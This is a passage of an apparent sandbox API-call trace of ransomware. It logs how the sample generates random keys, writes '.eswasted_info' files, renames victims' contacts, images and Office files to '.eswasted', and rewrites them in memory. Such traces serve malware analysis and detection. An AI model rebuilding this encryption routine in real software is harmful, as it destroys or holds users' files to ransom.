Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted")) returned 1 [0071.552] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.552] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.552] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xaec3a [0071.552] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x1220000 [0071.552] CloseHandle (hObject=0xf8) returned 1 [0071.576] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.577] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.577] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.577] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.578] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.578] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.604] SetEndOfFile (hFile=0x110) returned 1 [0071.606] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.606] CloseHandle (hObject=0x110) returned 1 [0071.607] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0071.607] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1d8 | out: hHeap=0x4a0000) returned 1 [0071.607] _aulldvrm () returned 0x0 [0071.607] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.608] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.608] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.608] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0071.608] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4e1368 [0071.608] lstrcpyW (in: lpString1=0x4e13e8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.608] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.608] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.609] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.609] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.610] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.611] SetEndOfFile (hFile=0x110) returned 1 [0071.611] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.611] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.611] lstrcpyW (in: lpString1=0x4e13e8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.eswasted")) returned 1 [0071.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.612] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.612] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x10b1e [0071.612] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b1e) returned 0xb10000 [0071.612] CloseHandle (hObject=0x118) returned 1 [0071.620] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.620] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.620] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.620] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.621] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.621] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.630] SetEndOfFile (hFile=0x110) returned 1 [0071.632] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.632] CloseHandle (hObject=0x110) returned 1 [0071.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0071.634] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9738 | out: hHeap=0x4a0000) returned 1 [0071.634] _aulldvrm () returned 0x0 [0071.634] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.635] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.635] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0071.635] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4e1368 [0071.635] lstrcpyW (in: lpString1=0x4e13e8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.635] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.635] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.636] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.636] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.636] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.637] SetEndOfFile (hFile=0x110) returned 1 [0071.637] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.637] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.637] lstrcpyW (in: lpString1=0x4e13e8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.637] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.eswasted")) returned 1 [0071.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0071.638] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.638] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x493 [0071.638] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x493) returned 0x2d0000 [0071.638] CloseHandle (hObject=0x100) returned 1 [0071.661] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e6078) returned 1 [0071.662] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4d9648 | out: pbBuffer=0x4d9648) returned 1 [0071.662] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.662] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e6078) returned 1 [0071.663] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.663] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.671] SetEndOfFile (hFile=0x110) returned 1 [0071.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.673] CloseHandle (hObject=0x110) returned 1 [0071.675] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0071.675] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9818 | out: hHeap=0x4a0000) returned 1 [0071.675] _aulldvrm () returned 0x0 [0071.675] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e6078) returned 1 [0071.676] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.676] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0071.676] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4d9600 [0071.676] lstrcpyW (in: lpString1=0x4d9680, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.676] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.676] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e6078) returned 1 [0071.677] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.677] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.678] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.678] SetEndOfFile (hFile=0x110) returned 1 [0071.679] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.679] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.679] lstrcpyW (in: lpString1=0x4d9680, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.679] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.eswasted")) returned 1 [0071.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.680] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0071.680] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x496 [0071.680] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x496) returned 0x2d0000 [0071.680] CloseHandle (hObject=0x118) returned 1 [0071.683] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e6078) returned 1 [0071.683] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.683] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.683] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e6078) returned 1 [0071.684] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.684] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.693] SetEndOfFile (hFile=0x110) returned 1 [0071.695] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.695] CloseHandle (hObject=0x110) returned 1 [0071.696] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9600 | out: hHeap=0x4a0000) returned 1 [0071.696] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0071.696] _aulldvrm () returned 0x0 [0071.696] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e6078) returned 1 [0071.697] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.697] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0071.697] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4d9600 [0071.697] lstrcpyW (in: lpString1=0x4d9680, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.697] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.697] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e6078) returned 1 [0071.698] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.698] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0071.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.698] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.699] SetEndOfFile (hFile=0x110) returned 1 [0071.699] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.699] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.700] lstrcpyW (in: lpString1=0x4d9680, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.eswasted")) returned 1 [0071.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0071.819] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.819] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x494 [0071.819] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x494) returned 0x2d0000 [0071.819] CloseHandle (hObject=0x118) returned 1 [0071.822] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0071.823] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0071.823] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.823] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0071.824] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0071.824] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.832] SetEndOfFile (hFile=0x110) returned 1 [0071.834] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.834] CloseHandle (hObject=0x110) returned 1 [0071.836] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9600 | out: hHeap=0x4a0000) returned 1 [0071.836] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8b88 | out: hHeap=0x4a0000) returned 1 [0071.836] _aulldvrm () returned 0x0 [0071.836] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0071.836] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0071.837] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.837] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0o78-_zUg9WmxoYQZ.bmp") returned 90 [0071.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2be) returned 0x4e1ab8 [0071.837] lstrcpyW (in: lpString1=0x4e1b6c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0071.837] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0071.837] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0071.837] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0071.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0o78-_zUg9WmxoYQZ.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0o78-_zug9wmxoyqz.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.838] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.839] SetEndOfFile (hFile=0x110) returned 1 [0071.839] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.839] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0071.839] lstrcpyW (in: lpString1=0x4e1b6c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0o78-_zUg9WmxoYQZ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0o78-_zug9wmxoyqz.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0o78-_zUg9WmxoYQZ.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0o78-_zug9wmxoyqz.bmp.eswasted")) returned 1 [0071.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Gh-sG0PGI\\kSkyU4WWSeewwIe\\0o78-_zUg9WmxoYQZ.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2gh-sg0pgi\\kskyu4wwseewwie\\0o78-_zug9wmxoyqz.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.840] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0071.840] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) 